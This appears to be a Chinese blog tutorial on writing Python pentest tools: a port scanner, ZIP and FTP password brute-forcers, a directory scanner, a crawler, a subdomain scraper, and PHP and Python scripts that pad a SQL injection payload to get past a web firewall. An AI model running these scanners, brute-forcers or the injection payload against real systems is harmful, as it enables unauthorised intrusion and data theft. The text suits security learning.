python打造滲透工具集

python是門簡單易學的語言,強大的第三方庫讓咱們在編程中事半功倍,今天咱們就來談談python在滲透測試中的應用,讓咱們本身動手打造本身的滲透工具集。php

難易程度:★★★
閱讀點:python;web安全;
文章做者:xiaoye
文章來源:i春秋
關鍵字:網絡滲透技術html

1、信息蒐集–py端口掃描小腳本
端口掃描是滲透測試中經常使用的技術手段,發現敏感端口,嘗試弱口令或者默認口令爆破也是經常使用的手段,以前自學python時候百度着寫了個小腳本。
端口掃描小腳本:python

#coding: utf-8
import socket
import time
  
def scan(ip, port):
    try:
        socket.setdefaulttimeout(3)
        s = socket.socket()
        s.connect((ip, port))
        return True
    except:
        return
  
def scanport():
    print '做者:xiaoye'.decode('utf-8').encode('gbk')
    print '--------------'
    print 'blog: [url]http://blog.163.com/sy_butian/blog'[/url]
    print '--------------'
    ym = raw_input('請輸入域名(只對未使用cdn的網站有效):'.decode('utf-8').encode('gbk'))
    ips = socket.gethostbyname(ym)
    print 'ip: %s' % ips
    portlist = [80,8080,3128,8081,9080,1080,21,23,443,69,22,25,110,7001,9090,3389,1521,1158,2100,1433]
    starttime = time.time()
    for port in portlist:
          
        res = scan(ips, port)
        if res :
            print 'this port:%s is on' % port
    endtime = time.time()
    print '本次掃描用了:%s秒'.decode('utf-8').encode('gbk') % (endtime-starttime)
  
  
if __name__ == '__main__':
    scanport()

對於端口掃描技術,其實分不少種,一般是利用tcp協議的三次握手過程(從網上偷張圖。。)git

1.PNG

放出的那個腳本,是利用了tcp connect() 即完成了tcp三次握手全鏈接,根據握手狀況判斷端口是否開放,這種方式比較準確,可是會在服務器留下大量鏈接痕跡。github

固然,若是不想留下大量痕跡,咱們能夠在第三次握手過程,將ack確認號變成rst(釋放鏈接),鏈接沒有創建,天然不會有痕跡,可是這種方法須要root權限        web

好了,先講解一下咱們的py端口掃描小腳本:sql

核心代碼:數據庫

portlist = [80,8080,3128,8081,9080,1080,21,23,443,69,22,25,110,7001,9090,3389,1521,1158,2100,1433]
for port in portlist:
          
        res = scan(ips, port)
        if res :
            print 'this port:%s is on' % port

這段代碼是定義了要掃描的端口,而且用for ..in .. 來進行遍歷
編程

socket.setdefaulttimeout(3)
        s = socket.socket()
        s.connect((ip, port))

這段代碼,是利用了socket套接字,創建tcp鏈接,socket.socket()就是s = socket.socket(socket.AF_INET, socket.SOCK_STREAM),用於tcp鏈接創建安全

2、實用爆破小腳本–壓縮文件密碼爆破&&ftp爆破
對於壓縮文件,py有本身的處理模塊zipfile,關於zipfile的實例用法,在violent python裏有實例腳本,模仿書裏寫了個小腳本

#coding: utf-8
'''
z = zipfile.ZipFile('') , extractall
z.extractall(pwd)
'''
import zipfile
import threading
 
def zipbp(zfile, pwd):
        try:
                zfile.extractall(pwd=pwd)
                print 'password found : %s' % pwd
        except:
                return
def main():
        zfile = zipfile.ZipFile('xx.zip')
        pwdall = open('dict.txt')
        for pwda in pwdall.readlines():
                pwd = pwda.strip('\n')
                t = threading.Thread(target=zipbp, args=(zfile, pwd))
                t.start()
                #t.join()
if __name__ == '__main__':
        main()

其實腳本很簡單,核心就一個地方:

zfile = zipfile.ZipFile('xx.zip')
..............
zfile.extractall(pwd=pwd)

ZipFile是zipfile模塊重要的一個類,zfile就是類的實例,而extractall(pwd)就是類裏的方法,用於處理帶有密碼的壓縮文件;當pwd正確時,壓縮文件就打開成功。而此腳本就是利用了zipfile模塊的類和方法,加載字典不斷嘗試pwd,直至返回正確的密碼,爆破成功

python在爆破方面也頗有優點,好比ftp,py也有ftplib模塊來處理,一次ftp鏈接過程以下:

ftp = ftplib.FTP()
                ftp.connect(host, 21, 9)
                ftp.login(user, pwd)
                ftp.retrlines('LIST')
                ftp.quit()

connect(ip, port, timeout)用於創建ftp鏈接;login(user,pwd)用於登錄ftp;retrlines()用於控制在服務器執行命令的結果的傳輸模式;quit()方法用於關閉ftp鏈接

是否是以爲和zipfile的套路很像?沒錯,你會寫一個,就會寫另一個,就會寫許許多多的爆破腳本,腳本我就不放出來了,你們本身動手去寫一寫(p.s:關於ftp爆破,在加載字典以前,請先嚐試空密碼,即ftp.login(),萬一成功了呢。。)

3、目錄探測–py低配版御劍
昨天寫了個小腳本,用來探測目錄,實現和御劍同樣的效果,腳本是寫好了,開了多線程,可是還算很慢。。以後我會再次修改:

#coding: utf-8
import sys
import requests
import threading
 
def savetxt(url):
        with open('domain.txt', 'a') as f:
                url = url + '\n'
                f.write(url)
 
def geturl(url):
        r = requests.get(url, timeout=1)
        status_code = r.status_code
        if status_code == 200:
                print url + ' 200 ok'
                savetxt(url)
        #print url 
        #print status_code
         
syslen = len(sys.argv)
#print syslen
#res=[]
url = raw_input('請輸入要掃描目錄的網站\n'.decode('utf-8').encode('gbk'))
for i in range(1,syslen):
        with open(sys.argv[i], 'r') as f:
                for fi in f.readlines():
                        fi = fi.strip('\n')
                        #print fi
                        fi = url + '/' + fi
                        #print fi
                        t = threading.Thread(target=geturl, args=(fi,))
                        t.start()
                        t.join()
#res = ''.join(res)
#print res

 

2.PNG

能run起來,速度較慢。。

說一下主要思想吧,以後我改完再細講。。:

加載1個或者多個字典,將字典中的內容與輸入的url進行拼接獲得完整url;

關於加載多個字典,代碼實現以下:

syslen = len(sys.argv)
#print syslen
#res=[]
url = raw_input('請輸入要掃描目錄的網站\n'.decode('utf-8').encode('gbk'))
for i in range(1,syslen):
        with open(sys.argv[i], 'r') as f:
                for fi in f.readlines():
                        fi = fi.strip('\n')
                        #print fi
                        fi = url + '/' + fi

利用sys.argv,咱們輸入python yujian.py dir.txt就加載dir.txt,輸入dir.txt php.txt ,由於有for i in range(1,syslen):,syslen=3,range(1,3)返回[1,2];

with open(sys.argv, ‘r’) as f:它就會自動加載輸入的兩個txt文件(sys.argv[1]、sys.argv[2]);也就是說,咱們輸入幾個文件,它就加載幾個文件做爲字典

當咱們遇到php站點時,徹底能夠把御劍的字典拿過來,只加載php.txt dir.txt,這點和御劍是同樣的:

3.PNG

經過python的requests.get(url)的狀態返回碼status_code來對是否存在該url進行判斷;
若是返回200就將該url打印出來,而且存進txt文本里
目前是這麼個想法。。
———————————————————————–

更新:多線程加隊列目錄探測腳本 : https://github.com/xiaoyecent/scan_dir
有關於更多小腳本, 能夠訪問 https://github.com/xiaoyecent 目前添加了百度url採集、代理ip採集驗證、爬蟲、簡單探測網段存活主機等小腳本,新手單純交流學習,大牛勿噴


4、爬蟲爬取整站鏈接
這個爬蟲是慕課網上的螞蟻老師講的,感受作的很是好,就改了一下,原本是用來爬取百度百科python1000條詞條的(如今仍是能爬的,要是以後目標更新了,就得制訂新的爬蟲策略了,大的框架不須要變),改爲了爬取網站整站鏈接,擴展性仍是很好的。
爬蟲的基本構成,抓一張螞蟻老師的圖:

4.PNG

1.調度器:調度器用來對各個部分進行調度,如將url取出,送給下載器下載,將下載是頁面送給解析器解析,解析出新的url及想要的數據等
2.url管理器:url管理器要維護兩個set()(爲啥用set(),由於set()自帶去重功能),一個標識已抓取的url,一個標識待抓取的url,同時,url管理器還要有將解析器解析出來的新url放到待抓取的url裏的方法等
3.下載器:實現最簡單,抓取靜態頁面只須要r = requests.get,而後r.content,頁面內容就存進內存了,固然,你存進數據庫裏也是能夠的;可是同時也是擴展時的重點,好比某些頁面須要登錄才能訪問,這時候就得post傳輸帳號密碼或者加上已經登錄產生的cookie
4.解析器:BeautifulSoup或者正則或者採用binghe牛的pyquery來解析下載器下載來的頁面數據
5.輸出器:主要功能輸出想獲得的數據
調度器:
spider_main.py

#!/usr/bin/env python2
# -*- coding: UTF-8 -*-
 
from spider import url_manager, html_downloader, html_outputer, html_parser
 
 
class SpiderMain(object):
 
    def __init__(self):
        self.urls = url_manager.UrlManager()
        self.downloader = html_downloader.HtmlDownloader()
        self.parser = html_parser.HtmlParser()
        self.outputer = html_outputer.HtmlOutputer()
 
 
 
    def craw(self, root_url):
         
        self.urls.add_new_url(root_url)
        while self.urls.has_new_url():
            try :
                new_url = self.urls.get_new_url()
                print 'craw : %s' % new_url
                html_cont = self.downloader.download(new_url)
                new_urls, new_data = self.parser.parse(new_url, html_cont)
                self.urls.add_new_urls(new_urls)
                self.outputer.collect_data(new_data)
 
            except:
                print 'craw failed'
 
        self.outputer.output_html()
 
if __name__ == "__main__":
    root_url = "本身想爬的網站,我爬了下愛編程,效果還行"
    obj_spider = SpiderMain()
    obj_spider.craw(root_url)

其中__init__是初始化,url_manager, html_downloader, html_outputer, html_parser是本身寫的模塊,各個模塊裏有各自的類和方法,經過初始化獲得相應類的實例;
craw是調度器對各個模塊的調度:

new_url = self.urls.get_new_url()
                print 'craw : %s' % new_url
                html_cont = self.downloader.download(new_url)
                new_urls, new_data = self.parser.parse(new_url, html_cont)
                self.urls.add_new_urls(new_urls)
                self.outputer.collect_data(new_data)

分別對應着:
1.從待爬取url列表中取出一個url
2.將改url送往下載器下載,返回頁面內容
3.將頁面送往解析器解析,解析出新的url列表和想要的數據
4.調度url管理器,將新的url添加進帶爬取的url列表
5.調度輸出器輸出數據

url管理器:
url_manager.py:

#!/usr/bin/env python2
# -*- coding: UTF-8 -*-
class UrlManager(object):
    def __init__(self):
        self.new_urls = set()
        self.old_urls = set()
 
    def add_new_url(self, url):
        if url is None:
            return
        if url not in self.new_urls and url not in self.old_urls:
            self.new_urls.add(url)
 
    def add_new_urls(self, urls):
        if urls is None or len(urls) == 0:
            return
        for url in urls:
            self.add_new_url(url)
 
    def has_new_url(self):
        return len(self.new_urls) != 0
 
 
    def get_new_url(self):
        new_url = self.new_urls.pop()
        self.old_urls.add(new_url)
        return new_url

url_manager模塊裏的類,及類的方法

下載器:
html_downloader.py
原本螞蟻老師用的urllib,我給改了,改爲requests:

 

#!/usr/bin/env python2
# -*- coding: UTF-8 -*-
import urllib2
import requests
 
 
class HtmlDownloader(object):
 
    def download(self, url):
        if url is None:
            return None
        r = requests.get(url,timeout=3)
        if r.status_code != 200:
            return None
        return r.content

html解析器:
html_parser.py
把抓取策略給改了,如今是解析全部連接,即a標籤href的值

 

#!/usr/bin/env python2
# -*- coding: UTF-8 -*-
import re
import urlparse
 
from bs4 import BeautifulSoup
 
 
class HtmlParser(object):
 
    def parse(self, page_url, html_cont):
        if page_url is None or html_cont is None:
            return
 
        soup = BeautifulSoup(html_cont, 'html.parser', from_encoding='utf-8')
        new_urls = self._get_new_urls(page_url, soup)
        new_data = self._get_new_data(page_url, soup)
        return new_urls, new_data
 
    def _get_new_urls(self, page_url, soup):
        new_urls = set()
        links = soup.find_all('a')
        for link in links:
            new_url = link['href']
            new_full_url = urlparse.urljoin(page_url, new_url)
            new_urls.add(new_full_url)
        return new_urls
 
 
    def _get_new_data(self, page_url, soup):
        res_data = {}
 
        # url
 
        return res_data

html_outputer.py
這個看狀況,可要可不要,反正已經能打印出來了:

#!/usr/bin/env python2
# -*- coding: UTF-8 -*-
class HtmlOutputer(object):
 
    def __init__(self):
        self.datas = []
 
 
    def collect_data(self, data):
        if data is None:
            return
        self.datas.append(data)
 
    def output_html(self):
        fout = open('output.html', 'w')
        fout.write("<html>")
        fout.write("<body>")
        fout.write("<table>")
 
        for data in self.datas:
            fout.write("<tr>")
            fout.write("<td>%s</td>" % data['url'])
            #fout.write("<td>%s</td>" % data['title'].encode('utf-8'))
            #fout.write("<td>%s</td>" % data['summary'].encode('utf-8'))
            fout.write("</tr>")
        fout.write("</table>")
        fout.write("</body>")
        fout.write("</html>")
        fout.close()

運行效果:

5.PNG

這款爬蟲可擴展性挺好,以後你們能夠擴展爬取本身想要的內容

固然要是隻須要爬取某個頁面的某些內容,徹底沒必要要這麼麻煩,一個小腳本就行了:
好比我要爬取某二級域名接口中的二級域名結果:

#coding: utf-8
  
import urllib, re
  
def getall(url):
    page = urllib.urlopen(url).read()
    return page
  
def ressubd(all):
    a = re.compile(r'value="(.*?.com|.*?.cn|.*?.com.cn|.*?.org| )"><input')
    subdomains = re.findall(a, all)
    return (subdomains)
  
if __name__ == '__main__':
    print '做者:深夜'.decode('utf-8').encode('gbk')
    print '--------------'
    print 'blog: [url]http://blog.163.com/sy_butian/blog'[/url]
    print '--------------'
    url = 'http://i.links.cn/subdomain/' + raw_input('請輸入主域名:'.decode('utf-8').encode('gbk')) + '.html'
    all = getall(url)
    subd = ressubd(all)
    sub = ''.join(subd)
    s = sub.replace('http://', '\n')
    print s
    with open('url.txt', 'w') as f:
        f.writelines(s)

小腳本用正則就行了,寫的快

5、python在exp中的應用
以前海盜表哥寫過過狗的一個php fuzz腳本
http://bbs.ichunqiu.com/forum.php?mod=viewthread&tid=16134
表哥寫的php版本的:

 

<?php $i=10000;
$url = 'http://192.168.1.121/sqlin.php'; for(;;){
$i++;
  
echo "$i\n";
  
$payload = 'id=-1 and (extractvalue(1,concat(0x7e,(select user()),0x7e))) and 1='.str_repeat('3',$i); $ret = doPost($url,$payload);
  
if(!strpos($ret,'網站防火牆')){
  
echo "done!\n".strlen($payload)."\n".$ret; die();
}
  
}
  
  
function doPost($url,$data=''){ $ch=curl_init();
curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_POST, 1 ); curl_setopt($ch, CURLOPT_HEADER, 0 ); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 ); curl_setopt($ch, CURLOPT_POSTFIELDS, $data); $return = curl_exec ($ch);
  
curl_close ($ch); return $return;
}

我在本地搭了個環境,而後用python也寫了下,仍是挺好寫的:

 

#coding: utf-8
import requests, os
#i = 9990;
url = 'http://localhost:8090/sqlin.php'
 
def dopost(url, data=''):
        r = requests.post(url, data)
        return r.content
 
for i in range(9990, 10000):
        payload = {'id':'1 and 1=' + i * '3' + ' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))'}
        #print payload
        ret = dopost(url, payload)
        ret = ''.join(ret)
        if ret.find('網站防火牆') == -1:
                print "done\n" + "\n" + ret
                exit(0)

6、總結      學生黨仍是很苦逼的,1.15號才考完試,不說了,寫文章寫了倆小時。。我去複習了,各位表哥有意見或者建議儘管提,文章哪裏不對的話會改的

相關文章
相關標籤/搜索